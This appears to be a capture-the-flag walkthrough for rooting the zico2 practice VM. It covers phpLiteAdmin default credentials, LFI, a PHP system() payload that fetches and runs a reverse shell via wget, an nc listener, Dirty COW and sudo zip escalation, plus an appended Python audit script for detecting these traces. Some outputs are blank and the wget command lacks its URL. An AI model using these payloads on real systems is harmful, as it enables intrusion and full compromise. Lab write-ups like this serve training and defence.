Rooting zico2 Walkthrough


zico2 is a boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by exploiting its vulnerabilities, leading to full system compromise.

Lab Setup:

  • VMware Workstation for the virtual machines
  • Kali Linux VM in Bridge mode
  • zico2 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc
  • pentestmonkey PHP reverse shell

Vulnerabilities Exploited:

  • Default password
  • Local file inclusion and phpliteadmin RCE
  • Passwords misconfiguration
  • Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)
  • sudo misconfiguration



Target VM IP Address:

nmap -p- -A <target-ip>

Nmap findings:

  • Target box is a Linux machine
  • SSH on port 22
  • Web server on port 80

Exploit path 1 for shell: LFI and phpLiteAdmin RCE

Let's explore the website in a browser.

Found an LFI vulnerability.

Other than the LFI, nothing fancy. Let's explore the website with DirBuster.

I found a dbadmin directory with DirBuster; it hosts "phpLiteAdmin v1.9.3".

Googling "phpLiteAdmin v1.9.3" vulnerabilities turned up the default password "admin" along with other vulnerabilities.

Logged into "phpLiteAdmin" with the password "admin".

"phpLiteAdmin v1.9.3" has other vulnerabilities that we will exploit.

Before that, let's check whether we can crack the test users' password hashes and reuse those passwords over SSH.

MD5 hashes cracked online:



These username:password pairs are not reusable over SSH.

Next target is the phpLiteAdmin v1.9.3 vulnerabilities. Let's google!

Let's exploit PHP remote code execution in phpLiteAdmin.

Before exploiting the SQL injection on the server, let's host reverse-shell.php on the attacking machine:

and also start a nc reverse-connection handler on the attacking machine:

nc -nvlp 1234

Configuration on the attacking machine is complete.

Now, on the target box, I created a database named sahi and renamed it to sahi.php.

Then I created a table with a text column and set its default value to our code:

<?php system("wget -O /usr/databases/shell4.php; php /usr/databases/shell4.php"); ?>

Access the database file from the browser.

We received a reverse shell connection.

Let's break out of the restricted shell:

python -c "import pty; pty.spawn('/bin/bash');"

Exploring /home/zico/wordpress/wp-config.php we found the database connection settings:



Let's log in over SSH with this username and password.

Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

Let's compile and root using this exploit:

Congrats! We are root.

Privilege Escalation 2: sudo misconfiguration.

The zip utility is granted sudo privileges. zip can execute system commands, so when it is invoked with sudo every command it runs executes as root. So let's invoke a shell!!!

Congrats, we are root a second time!!!
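Both privilege-escalation paths above leave simple host-level evidence: the Dirty COW /etc/passwd method alters /etc/passwd, and the sudo path depends on a rule granting a shell-capable binary. The following audit is an added example written for this walkthrough, not code from the original post; the SHELL_CAPABLE list, the sudoers parsing and the sample inputs are assumptions/constructed.

```python
import re
# Binaries that run arbitrary commands when invoked via sudo: zip is the one this
# box grants; the rest are well-known equivalents (assumed list, extend as needed).
SHELL_CAPABLE = {"zip", "tar", "vim", "vi", "less", "find", "awk", "python", "perl", "env", "bash", "sh"}
# user  host = (runas) [TAG:] cmd, cmd ...   (Defaults and alias lines are skipped)
SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?P<spec>.+)$")

def audit_sudoers(text):
    """Return (user, command, reason) for every rule granting ALL or a shell-capable binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        tags = set()
        for part in m.group("spec").split(","):
            tags |= set(re.findall(r"\b([A-Z]+):", part.split("/", 1)[0]))  # e.g. NOPASSWD:
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", part.strip())
            name = (cmd.split("/")[-1].split() or [""])[0]
            if cmd == "ALL" or name in SHELL_CAPABLE:
                why = "ALL commands" if cmd == "ALL" else f"{name} can spawn a shell"
                findings.append((m.group("who"), cmd, ("NOPASSWD, " if "NOPASSWD" in tags else "") + why))
    return findings

def suspicious_passwd_entries(text):
    """Flag /etc/passwd lines a Dirty COW passwd overwrite typically leaves behind."""
    hits = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        if f[2] == "0" and f[0] != "root":
            hits.append((f[0], "uid 0 but not root"))
        if f[1] not in ("x", "*", "!", ""):
            hits.append((f[0], "password hash stored in /etc/passwd"))
    return hits

# Constructed sample inputs (not copied from the zico2 box).
SAMPLE_SUDOERS = """\
root  ALL=(ALL:ALL) ALL
zico  ALL=(root) NOPASSWD: /usr/bin/zip
alice ALL=(ALL) /bin/systemctl restart apache2
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
constructed_uid0:$6$constructed$placeholder:0:0::/root:/bin/bash
"""
```

Run `audit_sudoers(open("/etc/sudoers").read())` and `suspicious_passwd_entries(open("/etc/passwd").read())` on a host to get the same findings for real files.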
